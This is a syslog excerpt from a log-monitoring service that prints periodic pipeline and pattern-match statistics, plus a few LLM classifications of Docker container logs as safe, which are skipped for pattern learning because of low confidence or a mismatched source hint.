Mar 20 01:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:31.949279 [observer] Patterns: hash=637 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:01.963912 [observer] Pipeline: processed=652 pattern_hits=641 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:01.963943 [observer] Patterns: hash=641 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:31.935975 [observer] Pipeline: processed=656 pattern_hits=645 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:31.936003 [observer] Patterns: hash=645 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:01.956814 [observer] Pipeline: processed=660 pattern_hits=649 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:01.956851 [observer] Patterns: hash=649 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:31.944208 [observer] Pipeline: processed=662 pattern_hits=651 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:00:31.944230 [observer] Patterns: hash=651 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:01.955725 [observer] Pipeline: processed=664 pattern_hits=653 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:01.955755 [observer] Patterns: hash=653 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:31.933545 [observer] Pipeline: processed=668 pattern_hits=657 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:01:31.933569 [observer] Patterns: hash=657 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:01.957858 [observer] Pipeline: processed=670 pattern_hits=659 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:01.957886 [observer] Patterns: hash=659 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:31.933722 [observer] Pipeline: processed=674 pattern_hits=663 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:02:31.933750 [observer] Patterns: hash=663 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:01.946786 [observer] Pipeline: processed=676 pattern_hits=665 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:01.946845 [observer] Patterns: hash=665 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:31.933692 [observer] Pipeline: processed=680 pattern_hits=669 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:03:31.933716 [observer] Patterns: hash=669 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:01.962772 [observer] Pipeline: processed=682 pattern_hits=671 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:01.962803 [observer] Patterns: hash=671 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:31.934775 [observer] Pipeline: processed=686 pattern_hits=675 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:04:31.934800 [observer] Patterns: hash=675 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:01.940094 [observer] Pipeline: processed=690 pattern_hits=679 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:01.940119 [observer] Patterns: hash=679 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:31.944391 [observer] Pipeline: processed=692 pattern_hits=681 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:05:31.944421 [observer] Patterns: hash=681 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:06:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:02.084354 [observer] Pipeline: processed=696 pattern_hits=685 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:06:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:02.084388 [observer] Patterns: hash=685 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:31.944050 [observer] Pipeline: processed=698 pattern_hits=687 llm_calls=11 llm_errors=0 learned=0
Mar 20 02:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:31.944091 [observer] Patterns: hash=687 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.130949 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.130988 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.142112 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 02:06:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:06:51.142153 [analyzer] Confidence 0.80 too low for pattern learning (need 0.85+)
Mar 20 02:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:01.950572 [observer] Pipeline: processed=704 pattern_hits=691 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:01.950692 [observer] Patterns: hash=691 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:31.937602 [observer] Pipeline: processed=706 pattern_hits=693 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:07:31.937627 [observer] Patterns: hash=693 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:01.952199 [observer] Pipeline: processed=708 pattern_hits=695 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:01.952283 [observer] Patterns: hash=695 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:31.933793 [observer] Pipeline: processed=712 pattern_hits=699 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:08:31.933818 [observer] Patterns: hash=699 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:01.955302 [observer] Pipeline: processed=714 pattern_hits=701 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:01.955331 [observer] Patterns: hash=701 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:31.933645 [observer] Pipeline: processed=720 pattern_hits=707 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:09:31.933669 [observer] Patterns: hash=707 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:01.948685 [observer] Pipeline: processed=722 pattern_hits=709 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:01.948718 [observer] Patterns: hash=709 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:31.933647 [observer] Pipeline: processed=726 pattern_hits=713 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:10:31.933672 [observer] Patterns: hash=713 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:01.951479 [observer] Pipeline: processed=728 pattern_hits=715 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:01.951507 [observer] Patterns: hash=715 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:31.949612 [observer] Pipeline: processed=730 pattern_hits=717 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:11:31.949635 [observer] Patterns: hash=717 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:01.937854 [observer] Pipeline: processed=734 pattern_hits=721 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:01.937881 [observer] Patterns: hash=721 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:31.949666 [observer] Pipeline: processed=736 pattern_hits=723 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:12:31.949695 [observer] Patterns: hash=723 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:01.939907 [observer] Pipeline: processed=740 pattern_hits=727 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:01.939937 [observer] Patterns: hash=727 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:31.941676 [observer] Pipeline: processed=742 pattern_hits=729 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:13:31.942570 [observer] Patterns: hash=729 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:01.948316 [observer] Pipeline: processed=746 pattern_hits=733 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:01.948344 [observer] Patterns: hash=733 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:31.934828 [observer] Pipeline: processed=750 pattern_hits=737 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:14:31.934856 [observer] Patterns: hash=737 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:01.951533 [observer] Pipeline: processed=752 pattern_hits=739 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:01.951561 [observer] Patterns: hash=739 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:31.939633 [observer] Pipeline: processed=756 pattern_hits=743 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:15:31.939659 [observer] Patterns: hash=743 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:01.980242 [observer] Pipeline: processed=758 pattern_hits=745 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:01.980275 [observer] Patterns: hash=745 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:31.934012 [observer] Pipeline: processed=762 pattern_hits=749 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:16:31.934034 [observer] Patterns: hash=749 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:01.952722 [observer] Pipeline: processed=764 pattern_hits=751 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:01.952753 [observer] Patterns: hash=751 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:31.933719 [observer] Pipeline: processed=768 pattern_hits=755 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:17:31.933743 [observer] Patterns: hash=755 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:01.955693 [observer] Pipeline: processed=770 pattern_hits=757 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:01.955750 [observer] Patterns: hash=757 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:31.951542 [observer] Pipeline: processed=772 pattern_hits=759 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:18:31.951568 [observer] Patterns: hash=759 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:01.948112 [observer] Pipeline: processed=776 pattern_hits=763 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:01.948536 [observer] Patterns: hash=763 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:31.933463 [observer] Pipeline: processed=778 pattern_hits=765 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:19:31.933485 [observer] Patterns: hash=765 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:01.941688 [observer] Pipeline: processed=784 pattern_hits=771 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:01.941715 [observer] Patterns: hash=771 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:31.935364 [observer] Pipeline: processed=786 pattern_hits=773 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:20:31.935387 [observer] Patterns: hash=773 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:01.944286 [observer] Pipeline: processed=790 pattern_hits=777 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:01.944442 [observer] Patterns: hash=777 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:31.934722 [observer] Pipeline: processed=792 pattern_hits=779 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:21:31.934746 [observer] Patterns: hash=779 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:01.954710 [observer] Pipeline: processed=794 pattern_hits=781 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:01.954736 [observer] Patterns: hash=781 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:31.934539 [observer] Pipeline: processed=798 pattern_hits=785 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:22:31.934570 [observer] Patterns: hash=785 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:01.950475 [observer] Pipeline: processed=800 pattern_hits=787 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:01.950508 [observer] Patterns: hash=787 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:31.933747 [observer] Pipeline: processed=804 pattern_hits=791 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:23:31.933771 [observer] Patterns: hash=791 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:24:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:02.101779 [observer] Pipeline: processed=806 pattern_hits=793 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:24:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:02.101822 [observer] Patterns: hash=793 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:31.933722 [observer] Pipeline: processed=810 pattern_hits=797 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:24:31.933745 [observer] Patterns: hash=797 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:01.942984 [observer] Pipeline: processed=814 pattern_hits=801 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:01.943018 [observer] Patterns: hash=801 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:31.950832 [observer] Pipeline: processed=816 pattern_hits=803 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:25:31.950859 [observer] Patterns: hash=803 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:01.955023 [observer] Pipeline: processed=820 pattern_hits=807 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:01.955054 [observer] Patterns: hash=807 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:31.942881 [observer] Pipeline: processed=822 pattern_hits=809 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:26:31.942907 [observer] Patterns: hash=809 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:01.938759 [observer] Pipeline: processed=826 pattern_hits=813 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:01.938787 [observer] Patterns: hash=813 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:31.942106 [observer] Pipeline: processed=828 pattern_hits=815 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:27:31.942135 [observer] Patterns: hash=815 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:01.935880 [observer] Pipeline: processed=832 pattern_hits=819 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:01.935905 [observer] Patterns: hash=819 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:31.933559 [observer] Pipeline: processed=834 pattern_hits=821 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:28:31.933591 [observer] Patterns: hash=821 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:01.995887 [observer] Pipeline: processed=836 pattern_hits=823 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:01.995918 [observer] Patterns: hash=823 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:31.936328 [observer] Pipeline: processed=840 pattern_hits=827 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:29:31.936351 [observer] Patterns: hash=827 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:01.941908 [observer] Pipeline: processed=844 pattern_hits=831 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:01.941932 [observer] Patterns: hash=831 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:31.934827 [observer] Pipeline: processed=848 pattern_hits=835 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:30:31.934855 [observer] Patterns: hash=835 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:01.994625 [observer] Pipeline: processed=850 pattern_hits=837 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:01.994735 [observer] Patterns: hash=837 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:31.933709 [observer] Pipeline: processed=854 pattern_hits=841 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:31:31.933732 [observer] Patterns: hash=841 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:01.945832 [observer] Pipeline: processed=856 pattern_hits=843 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:01.945863 [observer] Patterns: hash=843 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:31.951293 [observer] Pipeline: processed=858 pattern_hits=845 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:32:31.951314 [observer] Patterns: hash=845 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:01.941556 [observer] Pipeline: processed=862 pattern_hits=849 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:01.941671 [observer] Patterns: hash=849 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:31.944201 [observer] Pipeline: processed=864 pattern_hits=851 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:33:31.944227 [observer] Patterns: hash=851 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:01.941469 [observer] Pipeline: processed=868 pattern_hits=855 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:01.941500 [observer] Patterns: hash=855 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:31.944143 [observer] Pipeline: processed=870 pattern_hits=857 llm_calls=13 llm_errors=0 learned=0
Mar 20 02:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:31.944184 [observer] Patterns: hash=857 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=13
Mar 20 02:34:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:45.005032 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=regex
Mar 20 02:34:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:45.008110 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 02:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:54.975986 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 02:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:54.976021 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 02:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:59.903190 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 02:34:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 02:34:59.903227 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern
